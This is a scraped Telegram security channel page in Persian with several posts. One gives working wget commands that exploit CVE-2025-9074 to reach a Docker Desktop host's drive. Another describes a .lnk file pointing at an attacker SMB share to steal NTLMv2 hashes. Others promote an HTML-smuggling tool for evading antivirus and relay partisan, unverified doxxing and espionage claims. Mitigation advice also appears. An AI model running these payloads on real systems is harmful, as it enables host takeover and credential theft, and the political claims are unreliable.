RadvanSec – Telegram
RadvanSec
989 subscribers
181 photos
27 videos
142 files
595 links
"Security is Just an Illusion"
" امنیت فقط یک توهم است "

RadvanSec.com

Youtube , Instagram : @RadvanSec
Download Telegram
کنکور اسکمه باگ بزنید 👎

لایک کنید برسه دست سنجش
18👎1
Forwarded from Xero Notes
🐋 آسیب‌پذیری CVE-2025-9074 در Docker Desktop

اخیرا از آسیب‌پذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را می‌دهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیب‌پذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی می‌توان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.

💥 این آسیب‌پذیری چطور به وجود آمده است؟

در Docker Desktop نسخه‌های قبل از ۴.۴۴.۳، هر کانتینری می‌توانست به API Docker با آدرس http://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم می‌تواند یک کانتینر جدید با دسترسی‌های ویژه راه‌اندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم می‌کند.

💠 نمونه کد برای آزمایش آسیب‌پذیری

ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh


سپس با استفاده از پیلود زیر، آسیب‌پذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json

cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start


این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create


یک کانتینر جدید با دستور echo pwned > /mnt/host_root/pwn.txt می‌سازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ می‌کند.

📊 امتیاز CVSS

این آسیب‌پذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار می‌گیرد:

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H


راه‌حل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.

🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074

#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
5🔥1
هکر معروف هک شد!

اخیرا یک گروه هکری موسوم به «گمنامان»، مدعی شد که به ایمیل های گروه هکری معروف «بکدور» دسترسی پیدا کرده است. بک دور عنوان یک گروه هکری است که از سال 1401 و در پی وقوع اغتشاشات، بروز و ظهور پیدا کرد. این گروه هکری که مدعی اخذ دسترسی به سامانه های سازمان ثبت احوال کشور شده بود با افشای اسناد سجلی، هویت برخی افراد در داخل کشور ازجمله برخی نیروهای فراجا را منتشر مینمود. این گروه هکری سپس انتشار اسناد هویتی برخی خبرنگاران مشهور صداوسیما را نیز در دستور کار خود قرار داد. این اقدام که به طور واضح با هدف اعمال فشار به این چهره های رسانه ای انجام میشد با استقبال ویژه ی شبکه ی ایران اینترنشنال مواجه شد و به سرعت اخبار آن در رسانه های معاند انتشار یافته و نام این گروه هکری نیز برسر زبان ها افتاد.
حالا یک گروه هکری موسوم به گمنامان ادعا نموده که ایمیل گروه هکری معروف بکدور را هک نموده و به اسنادی از ارتباط پنهانی میان این گروه هکری و عوامل شبکه اینترنشنال دسترسی پیدا نموده که نشان میدهد «بکدور» از طریق آنان با موساد در ارتباط بوده است.
جالب اینجاست که در سندی که گمنامان از ایمیل های بک دور منتشرنموده، مشاهده میشود که نریمان غریب(چهره رسانه ای همکار با اینترنشنال و نزدیک به موساد) ابتدا از طریق ارسال ایمیل، از بکدور خواسته است تا اطلاعات هویتی پدر و مادر خودش یعنی نریمان غریب را به او بدهد تا بتواند صحت عملکرد بکدور را راستی آزمایی کند. پس از اطمینان از دسترسی بکدور به ثبت احوال کشور، سپس نریمان غریب سفارش داده است تا اطلاعات دونفر از خبرنگاران مشهور صداوسیما را به وی بدهد. این اطلاعات پس از چندی دستمایه رسانه ای شبکه ایران اینرنشنال شد.
حالا گروه هکری گمنامان در آخرین پست خود با انتشار جمله «هکر بودن به معنای مصونیت نیست؛ دیر یا زود، سراغتان خواهیم آمد.»به گروه های هکری که با سرویس های اطلاعاتی دشمن همکاری میکنند هشدار داده است.

⭐️ @ZeroSec_team
🔥11🤡4😁2👎1
🚨 آسیب‌پذیری Zero-Click جدید در ویندوز (CVE-2025-50154) 🚨

آسیب‌پذیری جدید به اسم CVE-2025-50154 کشف شده که پچ قبلی مایکروسافت (CVE-2025-24054) رو دور می‌زنه
این باگ به مهاجم اجازه می‌ده بدون نیاز به کلیک کاربر (Zero-Click) هش‌های NTLMv2 رو بدزده و حتی فایل‌های اجرایی رو بی‌سروصدا دانلود کنه

چطور میشه ازش سوءاستفاده کرد
با یه فایل .lnk ساده که مسیرش به یه سرور SMB مخرب (مثل \\evil-ip\share\bad.exe) اشاره داره و آیکونش از shell32.dll محلی لود می‌شه می‌تونید Windows Explorer رو گول بزنید وقتی Explorer فایل رو رندر می‌کنه (مثلاً تو پوشه Downloads) یه درخواست SMB می‌فرسته و بوم! هش NTLMv2 کاربر لو می‌ره تازه فایل اجرایی هم تو %TEMP% دانلود می‌شه

این هش‌ها برای NTLM Relay (مثلاً به LDAP یا SMB برای Domain Takeover) یا کرک آفلاین با Hashcat عالیه می‌تونید با ترکیبش با CVE-2025-53770 (باگ SharePoint) به RCE برسید
کد اثبات مفهوم تو GitHub (rubenformation) هست با Responder یا Impacket یه سرور SMB راه بندازید و تو چند ثانیه هش‌ها رو بگیرید. با Wireshark هم می‌تونید رفتار رو مانیتور کنید

لینک PoC
https://lnkd.in/d6w4Vk4p


🛡️برای عزیزان Blue Team: چطور جلوی این فاجعه رو بگیریم؟

ترافیک SMB خروجی رو با Zeek یا Suricata مانیتور کنید (دنبال NTLM Challenge/Response باشید) تو Event Viewer به Event ID 5145 نگاه کنید یا با EDR (مثل Defender یا CrowdStrike) رفتار مشکوک Explorer.exe رو رصد کنید


#امنیت_سایبری #ویندوز #آسیب_پذیری #Cybersecurity #RedTeam #BlueTeam #CVE_2025_50154 #NTLM #ZeroClick

⭐️ @ZeroSec_team
4❤‍🔥1
📊 Watcher Summary Report

🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 61 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
4
🚨 Open Redirect ؛ کوچک ولی دروازه‌ای برای حملات بزرگ!

خیلی‌ها وقتی اسم Open Redirect میاد سریع میگن:
"Low Impact ارزش توجه نداره"

ولی واقعیت اینه که همین باگ کوچیک می ‌تونه راه ورود به حملات بزرگ ‌تر و
باگ‌ های بالاتر باشه و ایمپکت ضعف‌های دیگه رو به شدت افزایش بده.

🔹 چه باگ‌ هایی میشه با Open Redirect ایمپکتشون رو بالا برد؟

CSRF (Cross-Site Request Forgery)

با کمک Open Redirect میشه محدودیت‌های SameSite رو دور زد و درخواست ‌های حساس (POST/DELETE) رو از طرف کاربر فرستاد.

XSS (Cross-Site Scripting)

میشه مسیر ریدایرکت رو به صفحه مخرب یا کد جاوااسکریپت آلوده تغییر داد و اجراش کرد.

Broken Authentication / Session Hijacking

قربانی رو میشه به صفحات جعلی هدایت کرد تا Session یا رمز عبور رو لو بده.

Phishing / Social Engineering

Open Redirect امکان فریب کاربر برای ورود به صفحات جعلی و دزدیدن اطلاعات شخصی رو راحت می‌کنه.

Open-Redirect to Sensitive Endpoints

حتی میشه کاربران رو به صفحات مهم مثل reset password، payment confirmation یا صفحات ادمین هدایت کرد تا Exploit بیشتری انجام بشه.

Clickjacking Enhancement

با ترکیب Open Redirect و iframe میشه کاربران رو برای کلیک روی عناصر مخرب فریب داد.

Bypass Security Filters

بعضی فیلترهای URL یا WAFها رو میشه با Open Redirect دور زد و payloadهای مخرب رو وارد کرد.

نکته مهم:

Open Redirect به تنهایی شاید بی‌اهمیت باشه،
ولی وقتی باگ‌های دیگه مثل CSRF، XSS، Broken Auth یا حتی Clickjacking رو همراهش داشته باشی، خیلی راحت Impact از Low به High یا حتی Critical میره.

💡 درس امنیتی: هیچ باگی رو دست کم نگیر!
کوچک‌ترین باگ‌ها می‌تونن به دروازه‌ای برای حملات پیچیده و جدی تبدیل بشن.

⭐️ @ZeroSec_team
4
Media is too big
VIEW IN TELEGRAM
Ryan Montgomery (0day) - #1 Ethical Hacker Who Hunts Child Predators Catches One Live On Podcast | SRS #56

⭐️ @ZeroSec_team
4🔥1
Audio
Ryan Montgomery (0day) - #1 Ethical Hacker Who Hunts Child Predators Catches One Live On Podcast | SRS #56

⭐️ @ZeroSec_team
👍2👏2
Forwarded from Deleted Account
Media is too big
VIEW IN TELEGRAM
#writeup
#idor
Insecure Direct Object Reference / IDOR Explained // How to Bug Bounty


⭐️ @ZeroSec_team
4🔥1😱1
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
4
Bug-Hunter & Pen-Tester

⭐️ @ZeroSec_team
🤣14🤡32
📊 Watcher Summary Report

🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item

🔗 Details: Click here

#zerosec #bugbounty #watcher #summary_report


⭐️ @ZeroSec_team
2👍1
Offensive Security Tool: smugglo

smugglo, developed by b3rito, is an HTML smuggling tool that generates self-contained HTML payloads capable of embedding arbitrary files directly into a browser-renderable HTML document.

When opened in a browser, these payloads automatically reconstruct and trigger download of the original file using client-side JavaScript, without requiring user interaction. The tool supports multiple encoding and encryption methods, including Base64, hex, XOR, and AES-GCM, to obfuscate the embedded content. It can help with testing file delivery paths in environments protected by content filters, sandboxes, EDRs, or antivirus solutions.
__________________________________________

🔹 ابزار امنیتی تهاجمی: smugglo

smugglo که توسط b3rito توسعه داده شده، یک ابزار HTML Smuggling هست که می‌تونه پیلودهای HTML خودکفا تولید کنه. این پیلودها قادرند فایل‌های دلخواه رو مستقیماً داخل یک سند HTML که مرورگر می‌تونه رندر کنه، جاسازی کنند.

وقتی کاربر این فایل HTML رو توی مرورگر باز می‌کنه، اسکریپت‌های جاوااسکریپت سمت کلاینت به‌طور خودکار فایل اصلی رو بازسازی و دانلود می‌کنن – بدون نیاز به هیچ تعامل کاربری.

این ابزار از چندین روش رمزگذاری و رمزنگاری پشتیبانی می‌کنه، از جمله:

Base64

hex

XOR

AES-GCM

که برای مبهم‌سازی (Obfuscation) محتوای جاسازی‌شده استفاده می‌شن.

کاربردش می‌تونه در تست سناریوهای تحویل فایل در محیط‌های محافظت‌شده باشه، مثل جایی که Content Filter، Sandbox، EDR یا آنتی‌ویروس وجود داره.


👉 Read the post: https://lnkd.in/e4N7pTyD

⭐️ @ZeroSec_team
5